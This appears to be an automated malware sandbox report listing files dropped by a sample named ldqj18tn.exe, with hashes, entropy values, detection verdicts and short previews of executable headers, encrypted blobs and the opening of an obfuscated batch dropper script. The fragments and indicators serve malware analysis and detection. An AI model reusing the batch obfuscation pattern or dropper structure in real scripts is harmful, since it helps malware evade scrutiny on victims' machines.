                                              Entropy (8bit):6.62028134425878
                                              Encrypted:false
                                              SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                              MD5:18CE19B57F43CE0A5AF149C96AECC685
                                              SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                              SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                              SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 8%
                                              Joe Sandbox View:
                                              • Filename: EO3RT0fEfb.exe, Detection: malicious
                                              • Filename: RMBOriPHVJ.exe, Detection: malicious
                                              • Filename: S6x3K8vzCA.exe, Detection: malicious
                                              • Filename: PPbimZI4LV.exe, Detection: malicious
                                              • Filename: l5VhEpwzJy.exe, Detection: malicious
                                              • Filename: duyba.lnk.download.lnk, Detection: malicious
                                              • Filename: pt8GJiNZDT.exe, Detection: malicious
                                              • Filename: c2.hta, Detection: malicious
                                              • Filename: c2.hta, Detection: malicious
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\AppData\Local\Temp\704579\Organizational.pif
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1177035
                                              Entropy (8bit):7.999838432083651
                                              Encrypted:true
                                              SSDEEP:24576:uWgaEyFxeBEglui3XzLBMX2rgfXG5KXZCN277jTzsc:0yFxAVumMX2rgfSKXoN277vzd
                                              MD5:AB0020D503E99E956AB92579E6690327
                                              SHA1:9E3ACD23F62F72CCABDBBCBAF21C31986FD694EA
                                              SHA-256:14A900791A0CF3D1A98491DC6E108EA1C814B41579F33851CF7A02460B9F9387
                                              SHA-512:BB2B853B050B7F778011FB9359D1E57808EB3FF3A4905679254E66C3F9C3B1FD6CC18C5589B11E96037ECCE2B4CB06B73433CDC704FD312C232AF98BBC151C6E
                                              Malicious:true
                                              Process:C:\Windows\SysWOW64\cmd.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:modified
                                              Size (bytes):893608
                                              Entropy (8bit):6.62028134425878
                                              Encrypted:false
                                              SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                              MD5:18CE19B57F43CE0A5AF149C96AECC685
                                              SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                              SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                              SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 8%
                                              Joe Sandbox View:
                                              • Filename: EO3RT0fEfb.exe, Detection: malicious
                                              • Filename: RMBOriPHVJ.exe, Detection: malicious
                                              • Filename: S6x3K8vzCA.exe, Detection: malicious
                                              • Filename: PPbimZI4LV.exe, Detection: malicious
                                              • Filename: l5VhEpwzJy.exe, Detection: malicious
                                              • Filename: duyba.lnk.download.lnk, Detection: malicious
                                              • Filename: pt8GJiNZDT.exe, Detection: malicious
                                              • Filename: c2.hta, Detection: malicious
                                              • Filename: c2.hta, Detection: malicious
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\SysWOW64\cmd.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1177035
                                              Entropy (8bit):7.999838432083651
                                              Encrypted:true
                                              SSDEEP:24576:uWgaEyFxeBEglui3XzLBMX2rgfXG5KXZCN277jTzsc:0yFxAVumMX2rgfSKXoN277vzd
                                              MD5:AB0020D503E99E956AB92579E6690327
                                              SHA1:9E3ACD23F62F72CCABDBBCBAF21C31986FD694EA
                                              SHA-256:14A900791A0CF3D1A98491DC6E108EA1C814B41579F33851CF7A02460B9F9387
                                              SHA-512:BB2B853B050B7F778011FB9359D1E57808EB3FF3A4905679254E66C3F9C3B1FD6CC18C5589B11E96037ECCE2B4CB06B73433CDC704FD312C232AF98BBC151C6E
                                              Malicious:true
                                              Process:C:\Users\user\Desktop\ldqj18tn.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):36299
                                              Entropy (8bit):7.995142843999967
                                              Encrypted:true
                                              SSDEEP:768:hfbk8c2PiL7CZcLVF7u3yq2OvvRZ+4BKKMtwFMsKCWf+QJddWz6nHu:tSqZcv6yq2OvZJ52dIzd
                                              MD5:48EEF161688B28BF638E0EC37DABB593
                                              SHA1:DD30CC2936BD9BE8C977653FC8E0590A0A96D707
                                              SHA-256:32873FBEC30BA467A770F8FA5D18AE9F5D30B383E1761036EC9CDF0491C9E57A
                                              SHA-512:3C76F72DF956D71E79E6BFFF54D6A8FACEE0F6A41CE0D7CD564BBFBA48B1C381A49B3C61E91BCE6C84FE172C55C791CD65665E0D26E4F7356C4457B712A788C9
                                              Malicious:true
                                              Process:C:\Users\user\Desktop\ldqj18tn.exe
                                              File Type:DOS executable (COM, 0x8C-variant)
                                              Category:dropped
                                              Size (bytes):93184
                                              Entropy (8bit):7.998062404457295
                                              Encrypted:true
                                              SSDEEP:1536:oA8gnQiP6RbR5TZJHTPs1GZO7ktznBUDjnMTcWh3FFHkPFGUFcAw2xNhz:m3iPEhTPs1GZO7k1nwDMJ3Pkzcyp
                                              MD5:73F15B295CA059461F4CCEA25DD9A56A
                                              SHA1:0B2834B85A315A2417C7AB51842937F3AD2E34DD
                                              SHA-256:CF1527A390FE3B945F60BA46F139D5EFCC8B20712A6388FE0FF99CAD6B661CF8
                                              SHA-512:31A459460A7D1C65AFFE2E085AC3835BF2C40EF0112F3C11AD6821B56A452B1EA53F5BF31FE2C83DBDE689D381506E54729BC515DA8E8F86BF6AE1F0785DB0CE
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Process:C:\Users\user\Desktop\ldqj18tn.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):94208
                                              Entropy (8bit):7.997963539367384
                                              Encrypted:true
                                              SSDEEP:1536:Getdq5yUrLGdyN60kxmcPu37oudLvidDCG4jx3yF8+Z3v8jdUU1tq00toMT:GetdqnidyNdmRGc2L+CcF8+Z0xUU1tqX
                                              MD5:75257307B8D4D5B354711B1AFB9807B9
                                              SHA1:F61C1599DEA1E8BCA46CF7176F5C367FC6C682F9
                                              SHA-256:7F34EA53E7774CE8455BF3EC2F6A38CA870740B05D866073ABF8738874212DE1
                                              SHA-512:B1317965AADC83E85CE16A839FAD180AC2BF0356BA305D1D14D33E22ECE8B7980CB5C9543E40B5C6830F626749AC233E4C2CB6A925DC72A8F85C49BD5FD67BDC
                                              Malicious:true
                                              Process:C:\Users\user\Desktop\ldqj18tn.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):96256
                                              Entropy (8bit):7.998514868354388
                                              Encrypted:true
                                              SSDEEP:1536:IvdYLR3NuhKqrKEN3tMdLgN/AfOTtbxaKiA9G0FnCerGGg/WTEFiIeHrygOI+T:IvdeRq39Mpg+fO/7ieGACmgyEF8ZOx
                                              MD5:C4E8EDFE5D08067625B63F23C2E8FB8A
                                              SHA1:D76FA360F0FE278C791442E9208A591C86476AF3
                                              SHA-256:B5638AA2E4141715075A21BA1D69D2E8B53E5CF055564C9E2B80E20A5340A766
                                              SHA-512:1AB6204134558D8AA28D43E7B860B57FAC12DA3F653A34FB5892D9241B04E7CBFFF3B5F8F8C2623F7354D0F9DF1078B19532F64CBD029D2D32B4D17863BD345F
                                              Malicious:true
                                              Process:C:\Users\user\Desktop\ldqj18tn.exe
                                              File Type:ASCII text, with very long lines (687), with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):13560
                                              Entropy (8bit):5.152446332556762
                                              Encrypted:false
                                              SSDEEP:384:vA5nkQWyUEMHlWiSDhV5qRwcbar5DrwcqEw/D486HsT2pn:vAVk5yUZHlWiSDDTrBrfqjc8wRpn
                                              MD5:D85FE4F4F91482191B18B60437C1944D
                                              SHA1:C639206AD03A4FCC600CE0F7F3D5F83AD1F505A1
                                              SHA-256:55941822431D9EB34DEAEF5917640E119FCD746F2D3985E211A2FF4A9C48FF92
                                              SHA-512:BD5E46C10DEC7D40E0151DABB28C77B077CE9BC2B853B01DECBCD296F6269051A01115C349DC094BBCF14153A13395FC7E5AB74DD53EB5B2DFBC4BF856692B09
                                              Malicious:false
                                              Preview:Set Fellow=r..EOtCosmetics-Sell-..tGMEArmenia-Fraud-..oPInstalling-Acquire-Groups-Americans-Promises-Ma-Wise-..QhqReligious-Ja-Desire-Frederick-Blowing-Sv-Legislative-Mileage-Fax-..isAHurricane-Damn-Inner-Efficient-..Set Mall=N..hacMapping-..debBillion-Channel-Integration-Might-Recorder-Bingo-..MCxAShower-Australian-Calculate-Tail-..xPWit-Lazy-..PzBasketball-Areas-Listening-Centered-Away-..kbCollectables-Temp-..Set Saskatchewan=X..UppaInnocent-Eugene-Examinations-Rw-..TvbSCocks-Statute-Flat-Mortality-Dominant-Metres-Sufficient-Seekers-Headset-..ZkMariah-..PASpot-..BoCrop-Publicly-Mel-..EvjlFinding-..LEhPhp-Earned-Aging-Greg-..gajhLight-Cod-Flat-Harm-Noted-Mounts-Further-..EuQuebec-Notice-Drinking-Front-Claimed-Symptoms-Vampire-Supporting-..RIBFrames-Membership-..Set Fluid=V..iQmEmployed-Single-Norway-Cloudy-Toy-..WfQReached-Glucose-..maePj-Atlas-Proof-..FYeNm-Throat-Spreading-..ojcSmile-..QCOperator-Browsers-Talented-Colonial-Hewlett-Subscriptions-Em-Interesting-Therapeutic-..Set Lodge
                                              Process:C:\Windows\SysWOW64\cmd.exe
                                              File Type:ASCII text, with very long lines (687), with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):13560
                                              Entropy (8bit):5.152446332556762
                                              Encrypted:false
                                              SSDEEP:384:vA5nkQWyUEMHlWiSDhV5qRwcbar5DrwcqEw/D486HsT2pn:vAVk5yUZHlWiSDDTrBrfqjc8wRpn
                                              MD5:D85FE4F4F91482191B18B60437C1944D
                                              SHA1:C639206AD03A4FCC600CE0F7F3D5F83AD1F505A1
                                              SHA-256:55941822431D9EB34DEAEF5917640E119FCD746F2D3985E211A2FF4A9C48FF92
                                              SHA-512:BD5E46C10DEC7D40E0151DABB28C77B077CE9BC2B853B01DECBCD296F6269051A01115C349DC094BBCF14153A13395FC7E5AB74DD53EB5B2DFBC4BF856692B09
                                              Malicious:false
                                              Preview:Set Fellow=r..EOtCosmetics-Sell-..tGMEArmenia-Fraud-..oPInstalling-Acquire-Groups-Americans-Promises-Ma-Wise-..QhqReligious-Ja-Desire-Frederick-Blowing-Sv-Legislative-Mileage-Fax-..isAHurricane-Damn-Inner-Efficient-..Set Mall=N..hacMapping-..debBillion-Channel-Integration-Might-Recorder-Bingo-..MCxAShower-Australian-Calculate-Tail-..xPWit-Lazy-..PzBasketball-Areas-Listening-Centered-Away-..kbCollectables-Temp-..Set Saskatchewan=X..UppaInnocent-Eugene-Examinations-Rw-..TvbSCocks-Statute-Flat-Mortality-Dominant-Metres-Sufficient-Seekers-Headset-..ZkMariah-..PASpot-..BoCrop-Publicly-Mel-..EvjlFinding-..LEhPhp-Earned-Aging-Greg-..gajhLight-Cod-Flat-Harm-Noted-Mounts-Further-..EuQuebec-Notice-Drinking-Front-Claimed-Symptoms-Vampire-Supporting-..RIBFrames-Membership-..Set Fluid=V..iQmEmployed-Single-Norway-Cloudy-Toy-..WfQReached-Glucose-..maePj-Atlas-Proof-..FYeNm-Throat-Spreading-..ojcSmile-..QCOperator-Browsers-Talented-Colonial-Hewlett-Subscriptions-Em-Interesting-Therapeutic-..Set Lodge
                                              Process:C:\Users\user\Desktop\ldqj18tn.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):81920
                                              Entropy (8bit):7.997721698642565
                                              Encrypted:true
                                              SSDEEP:1536:YReT3S6RaPlwij6WqGnCf/x9TkXGr8nwvp1aYzERXM7Wi:48hRGwlGS/8XGr8n2pBgXXi
                                              MD5:7B60F0D191C0904F3F5BE40433D86F73
                                              SHA1:E6B09A6670797332B8861FC93F44DA7CF224BBCB
                                              SHA-256:AA1CC0C31C1C15CCFF224BA06596D8DEF6F510280F077BA201650F18B0D67D90
                                              SHA-512:1D8FF33C53794E3467968F747172DBFDC362E99E24CE6652A0860FE4094D5A861ED2E2C307577FE033AF39836268BC6EF2CDB331AE8FB3B58F2FC7A3EBA257A8
                                              Malicious:true
                                              Process:C:\Users\user\Desktop\ldqj18tn.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):69632
                                              Entropy (8bit):7.997194265654002
                                              Encrypted:true
                                              SSDEEP:1536:v+pxZi1WY75TwdFzkQIfiLiR5fARQvjc9fdWx3L4wRrvTkTppGc:v0S5Jk+QIKirYaQpUx39c
                                              MD5:EFF591562D9AEA14D2872367F7B7103E
                                              SHA1:464E462445DC343E316FFCB6B29234C446D0A064
                                              SHA-256:5482A9A3B48354EB14C55DDB9E2595E79B03615C93464FD0F5FDD6E208AF4F82
                                              SHA-512:C75FA0300B30B71DE261982BE233E41A96E00E0B83FA4A9AD163FD3E740B1A2EFAC99435A1887459F6234F6BDE7ED5D9D53C1B26AE4F0414561A03E38AFCDCDD
                                              Malicious:true
                                              Process:C:\Users\user\Desktop\ldqj18tn.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):59392
                                              Entropy (8bit):7.996765889888764
                                              Encrypted:true
                                              SSDEEP:1536:awFUJIg3MqmVC8RUIvzJb+OriV7i8svKR5L8LXaIBMm83qclL:bUKg3pmVC8Rl+Zt1qIeeoG3qc5
                                              MD5:0B20ABB260FC790E78F84A960314499D
                                              SHA1:631654EB5A843F48D7D4F75A95305CF738A92500
                                              SHA-256:7491C99CCA33B24B2F8BD2EA72561D60154E51142796C28A46D32C2DB5E972B1
                                              SHA-512:6CA15FD999A40CF37AF80A2BA79A5ADC45F997D978B8051CF3D0C858AB26C2DED9D6CFAEDECAE1DDAAF1AFCEE2B9B72FF6E38064B8AECEF3BD4AC4314BDAA43D
                                              Malicious:true
                                              Process:C:\Users\user\Desktop\ldqj18tn.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):54272
                                              Entropy (8bit):7.996455408231238
                                              Encrypted:true
                                              SSDEEP:768:872ws5O3wKoSCM0ZV4EdtkFb5iezgE6kZn3RKcZweWZvNB+0EQuHmEchpW77Q2xB:C2xuDVC7s4eIsnB5ZwbNNsOEq245q1b
                                              MD5:24548BC705858B908DF8590C42555E34
                                              SHA1:DC16D01B52B94E0BFA33BF8124F8E55ABE1720A6
                                              SHA-256:B15854B830337EF3DB8458995B59B02037839D4C7D2EEB69124344E29AE77671
                                              SHA-512:F3C5D612BE5784B73255F5A0380E38FE116BC39D3B261582CB748C91CA098AD02D25DDDEAA57216F0B7E30589F3FA296E2945D8C4A3C04CC347AB0187EF08834
                                              Malicious:true
                                              Process:C:\Users\user\Desktop\ldqj18tn.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):101376
                                              Entropy (8bit):7.997914373248418
                                              Encrypted:true
                                              SSDEEP:1536:1H16MKOSG3fStcKwt97Fr6dj4go6KzouYbHYqEVSBjAFYI26wf9kp9ZB2lyDNumy:PxaG3atO77FedscQcYLfYN6wM7PO8E
                                              MD5:25AA98D5EF3952A5A0BFF32301C09AD8
                                              SHA1:569DD803FC9CFFA01C159C650648A3F627635000
                                              SHA-256:3377FF0A28AC9AD8BA3C164CE29503AB3E4BE2632978BC519859B59B3C9E6A16
                                              SHA-512:5C260F85F498D04E8F9CBFDF63521A86D69E8E60F2E5971CA3F95559B444B791F3F47C403D84193FF84C962214FF57ED9D6710AAA4059F78406AB220BC23371E
                                              Malicious:true
                                              Process:C:\Users\user\Desktop\ldqj18tn.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):61440
                                              Entropy (8bit):7.997269818226767
                                              Encrypted:true
                                              SSDEEP:1536:MXrI/MNgZ4Og0Rjihiu9qxwil6DIFcNZe:MXrI/fKYo6eZe
                                              MD5:1C80BC738D8205B5D4C2B2445CBB31F0
                                              SHA1:253BEC88BE97A71788D6152908CDBA73E55B46A3
                                              SHA-256:492E8EE10FE8D95577C96FF4CE184DF20560207DF7D1631948328B960434FA61
                                              SHA-512:1F299A0C55197C780D65D00909447EBCD5703EF9426AA6844C2897D572B3AAF555C2ED20C5BBDA965C8B25232F5A79DCF749417DF7915A60E6621DD1E16BF6EE
                                              Malicious:true
                                              Preview:..:d^n.q..M#l...L..~..{..I.h..7......z<.dd>....p.....n..)7..3......;.N.&......C.........Z*].Q.k..$.......l.\..s...w..T8..|..h..Xf....8[...O....gpr36b......&..=....LE..X...e.9G..d|i+..5.......M..R.........0....m.u..h.................mT......-f(4...b..k..k.RnaX...[!qA.(7.......7c..=...~2..K.c;......^Z.?..zT..(.$..F.at....^...0.~]`@M.......X......y4....\..j.)..b.ft.40G%y...5E.a.1..$.r.D..z...P.)....^..Qy....WE.l....G.44.8.pc..N..H$..Q..V,S../m+../.L.{....s.v!O..5xKG.K....!.r..;.....S.U.R.'3f...%!.6rB.R$S..J.N.........A....v.o.S.(.B../..y..gq.D.....4..D{...^.\...N&J.._.Or.....S..p%aX.F.*t.C/...Q.@...b.(..%S.....R<8uj..Y.q..@e].B..u..z...nf.7.~yt!O(...$..".qpMu.~...5@..k..-.E>.5..7u........R..e..>.`......N.B..7.3.@vh.[c..<......q..v..s......8.....~.5..=.{..~.W6....~.(....5.t.F.....3...?.]..9.h........N#u......wBa:,.6q.n>N..".Ix..>"..@z....?.......%3..X7....y....'d.A..~...F.W.....@..........J.V.......dz.....5.S...{..W.....+......8.l..O.
                                              Process:C:\Users\user\Desktop\ldqj18tn.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):5636
                                              Entropy (8bit):6.0876490146743425
                                              Encrypted:false
                                              SSDEEP:96:kfkxgUzr4tgOwVAfBzDICS09CAi6R7u+IhsObfS+NsPvj6ooxdofjxP3yGj1H034:smHAeOqAFDw09CV/2nPvj6DdMP3r1HI4
                                              MD5:598774EC6001A83BC8A24565E2A908BB
                                              SHA1:503438709CF002913D96E2A7EF51325B0605A64E
                                              SHA-256:79749AF598CD4506AD7AEFE35BA2CB8AC24CE4961E225E5DF345A95304AF1678
                                              SHA-512:0BDE914E7AFA80DFCEBA929C53C239FEAF0C21200C245D606CFFBF8E9AF1525F57B21E96F003DC4C4EC29120C641598CEA6EFB51530D542C83B989202E31A670
                                              Malicious:false
                                              Preview:MARTNMSPIDERRINGTONE..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B..........................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\Desktop\ldqj18tn.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):87040
                                              Entropy (8bit):7.9979586106795955
                                              Encrypted:true
                                              SSDEEP:1536:1w4kfylR3M4LxsCKKb5y+IWYzr0V0Ni6NNq6wOydrqcSusn+WLjkZeYctHeYIlhk:1/kaozzKNy+6PBhzwOGrBsn+WLjkZeu4
                                              MD5:7B0DEE84D05813B43B680C8FEAED52DF
                                              SHA1:6831401C9BDB63B42E6AE66B5B3A619A81BC07F4
                                              SHA-256:CC15CDF080BFC8C16B669782B545C9FF15633ADA54809FCF6BE8311E1EF684EE
                                              SHA-512:921D7B873A99C0665F32AAC000CEBBE3BF6A0D9CB8D82E6305083EFE57023971613EBB32956476DAE3ED7DCD71C7796F75D12A1840B1928845E47AA3645211C9
                                              Malicious:true
                                              Preview:6...G.....MO..&2..C".j..)u...7...p..E.(..NO..B..VljU..w7.#t.B)H....;.l...g..J.n.siJG(et..01V...A.A../!...b@WUd....2..T.."@..E.U..........P.0......d...Z....TJ....i....qa~...^'...9...M.-Z..>>3.l..3w>..70...........>.F`.....g5p;Ex.6.9.Q..6.....S....;..>..~.7..O...o..a.f..E&.GdD.....-R5H7...G........6...J....6H_-.4..uo.LQ..<.`T{..]r..~.u?!O~.....C......wt..g0u,Q...E4..d..?mq~...z.C>>\.....c..L._@j........9v.P.9..qh"..A..4&;.2.j...n.%...eK.|.$.z...+s....H.a..u.....u..m.YM...o..3...P.,M.........]...58.2....@...E,...[...Q.+..HU..'.<....i35-.wI....6^...=.s......0.0..-...5:.]mx.c..R....0.Y.e(8T...0B.....l-..)G.....K.@...e"..fc^D.}...YCo...`.Q...u....C..I._.^B...h....3.n...E.h....r.......x...-.cmY..a}..Y./..({..,g>..I.......>..U.B@.<$..<..V..}8..g.....a../O.[M.8.....e..r4.=.O.[..Ln6.M.{..c..?...^._....q....GGI.v..Z.........?..c.r...b}..*..V.b...i.=jF...M..".)..&......u!T|...^..]f. ...\....1Q.3.Q.....R.........PLb...t..C..r...M.y...]9...(.d.
                                              Process:C:\Users\user\Desktop\ldqj18tn.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):59392
                                              Entropy (8bit):7.99700719991649
                                              Encrypted:true
                                              SSDEEP:1536:kSgReDsZ2S57pfLb2Uf5c5saqKuvaRt4pn/GoUVjSoKgLWmHjJlym:kSZopbSpqKuk2puHgoKgLBHjJgm
                                              MD5:C9E306D19DEF703774D08975E553263B
                                              SHA1:8AB1DE74C5C1A45ABB93D0996C6D58F1530D4A4D
                                              SHA-256:E2CC14D5C33F5A9799D81683F017914C0C568FF4F634D5CDAA69DC086C01F88E
                                              SHA-512:8CEA19182FCEEDF07C81A7E5C9ED35E17591484C7BA4728EC65737E7E2ECFAFD288E656E036BF74E52E20EDED358223E058F5DEB8D9FF435EFB1B00FD94B51BA
                                              Malicious:true
                                              Preview:...._....Y.n..k<.|.....JPU.?.<a..2.I...^...z.Bs7.H..)...).W...!.~................4jF.......z...|...c8[.v..3.)g. .........i..sy.......%6.5........8.a.|."...*w...p....v.(...@.F.|..8.....Q.....tD%...".BL.;...@.........9.].ud.ya.....@....{......O...w.fB.zO.-....A..O.p+..-.....#?.....M.7L.9..zx.Q=.n..K.a....[...=...{.u....2.?R&(N..........(.1hZ..R...4Q +.K..y-..S..'_'d...1...........oHw.........6..a..."......x....g..l...V52.~..1..u..>r..^^.k....:.q....(..L.jI/..E.....<QD*8J..1V6.9.r.F..Z@.....-.C.s.xD...7.*:...Fzk.n......^i..D.....D.F.|J.....pP...G.CG.U.QL._..v.Yj.*.&."J.&.o.jK.....=!.yRo.3..;.G..U.p._...V..t...@.[.m.'.a.I$....1..8%.;=...z.3.....0.:PtE........l.fA;....^WL%.$.AK....Y..5<S...)! .,D.1.f..?K ..O..Re..P..:...Q.....)s0....Y...d?.>....}K2.......Fnl.x.|...Y9.t.{.....3.......d.H.~...9Z}.0..Gz4..v....+s..C:.<..*.W.....L....A.....I.!+.K).&.%....)...>.hN....x.r....U.. ....4.gO?......h[..U.....F..."t.G.b.....(Cv...>j:..K.]...C.
                                              Process:C:\Users\user\Desktop\ldqj18tn.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):53248
                                              Entropy (8bit):7.996397386083232
                                              Encrypted:true
                                              SSDEEP:1536:VDObOdYwNIGtwKnEscdKdnZ715rJVe6LODXFxLU:VDNdE4w6KC35DeXXFxQ
                                              MD5:26BFCB75C4F0FF69CEDE2EAEF6CBEC06
                                              SHA1:41D437AAAC0ACAA0D98C4FDA6586A61979B25F13
                                              SHA-256:7BE8B9F51B43F525D0140EDC5502BE3A6E7BCBD876DDDE442FABAD43B6D19B36
                                              SHA-512:126740665893FC6F775A8BF31CA7CC243CFE26A84A61752BADAA684DD156E08D6F473AF7F0C9796A8062C8A67AD873B0AA9DFC44679C84C4CC83ECFB63317381
                                              Malicious:true
                                              Preview:{./1.Z6....L_XQBe6w..H.....a..L0..sMoTt.sa.X=..e.R...........v9....B/...tX.q..A..c.39.....J.T.?^w.Z.Eg.H71..M.oN.....-8E.....W .....b.u...).D..-e.4....{.0..Afd..y.w.9...0... ......Z .1...zw..J9.z..r..ZrB......n.V.;.8..}.N....y.PU....*AV...'..Q...g.......v..=v8.Q....u\u..J.KH....1...*-....'.v.{.[.6..luS..kxvjx.-K.o.4:N...Q...R.2.Xi8.A..q..W...T..Y#....1......n.:)..~...x.fX...Q..v.X......Gq..$..1}.).e.N.W.v...A..Z$.2...$.L...)2.......Mj.Mt..z\h<....Or;..b...X6;...+?.M.Xa.5... .R....1l.|.A.<.;....N..i.......k.W............=..e...5......>*.c.o....:.6.FU..%...`M.f6.$...9.J...3.........D.....=HK.~.sec.D..0T..$..?....d+..4..h..u.Z...X..h+^.*......[.*C^p?[......v..a..KW4.....@"..T.ki..."...a|....z.7..c...q...\t-C..eV..[..<....V.x.C.n.|.X..b1.z.CL...ns"e.!...../.6.-).....^..KX.O....Sa~r..v..U{.$.....p.?z.M..:....<..`...e.l.UG.`L..A.3.?.Y.....n.?.t...!NUw|.F.G..x...I..B.}...l...H....q..)..?l.Y.h$.w0\XvZ.....y.[....!e..}....b/i..H....n...;....'.Gy6i1.:H>.*..-
                                              Process:C:\Users\user\Desktop\ldqj18tn.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):97280
                                              Entropy (8bit):7.998052732299105
                                              Encrypted:true
                                              SSDEEP:1536:Ni5X/n8JL88Im4dSgQ3QDLTTWWzDO2Phn3TYXY/EuESYwOOJltjb2It6rc8/NyS:NMXf898Fm4d6ADnTBzD1P2I/ECxLJlxi
                                              MD5:2B1531C3961A12A05168DDBEC6DE9351
                                              SHA1:BF02E49064C0B97400F5E54A588D02B584D0E700
                                              SHA-256:6A1F12DCAB292378358F48014D0078407B2A141237BD7B318A83539497346FB5
                                              SHA-512:5DB2C782FC950BBD409A551BBA32708A5A22B78779D92DAAF9C56B73B94CA8478493B15784FDE711292E87399A06C51D5898179E4B5302A0531492F330F73C57
                                              Malicious:true
                                              Preview:K8HH...T..P..+..z...t.wB..gqa.XiaN./.,.*8%.u...(.l.L..I...z.$.d......i.:.a~.V..!.[w....0.).._..x.g.b...f`{4!p" ..&`.P.C!..1...o..m..;...[-.<.?>o.p.m.....z.{yAR.....L.^aQO.N..._9...(.......;St.:.....8...%D.Qq..Of/p............7..v..J.h.m......................^.2......Z.#.H..<...G..l..Ab).4..e.|.......u...}.>.X..i...M&C..{-.....w.j+.,...hR..mGT....Ou.....,j.!B...@k..A7.y..T.....'d.`.=.B.(.}U%..H..^.......e6.4.....qz..25....u.....=....|.nOe......b#..]....^.Q.@...........&\~%..D.e.Cy;.'.T...w&H...f...*hl.OJ.....j...+.a.!.Y.[..q.E.....%j%u@.c..,L........}...b4...z".OG..^a...=...v...e.......^...? 7.DuZ..-.A..&..3.%.H...Z....P....A3-.?.[.}...7.a?..>.g[......e. .&*....c..e...N.0.\.z.m....,......_#.7..P..:9C.......N0....;.W...c.5.9.....r.....8..@...K.....9mK.}]".i..iNb?^L4.T.+...i........d..N..n]..0......./..GQ.....Uc....Q}.....4.VDq.Y...5......9.BRb.+.fgT...O........<gS.ImRe?@.x.....I..ZV..(.8..`..{<.2....*..\...,..)w...9/.q.>..~...n*..
                                              Process:C:\Users\user\Desktop\ldqj18tn.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):66560
                                              Entropy (8bit):7.9971208270762375
                                              Encrypted:true
                                              SSDEEP:1536:otshYdm8KllFFnGuyxeOFGpQMpItjKYvvOfPWE:qmNllvgLGpQhDvPE
                                              MD5:91880DAFDBDDDD3A7BECE82040731293
                                              SHA1:B2D53F9DCB1D79F5CAE8B20604CD22DAA223287D
                                              SHA-256:30B0CD78DBFB69528322CBD789347159AE4756A7667B889FDEF022ACC468A658
                                              SHA-512:FDE9B03522B27033E88371270D4491DF43A5B347F20221E7932548E9565BCDC08A8B7294C62F5CCDE1AAB0236061E13D675B3D1A213CD79384FC1E50ABE46B82
                                              Malicious:true
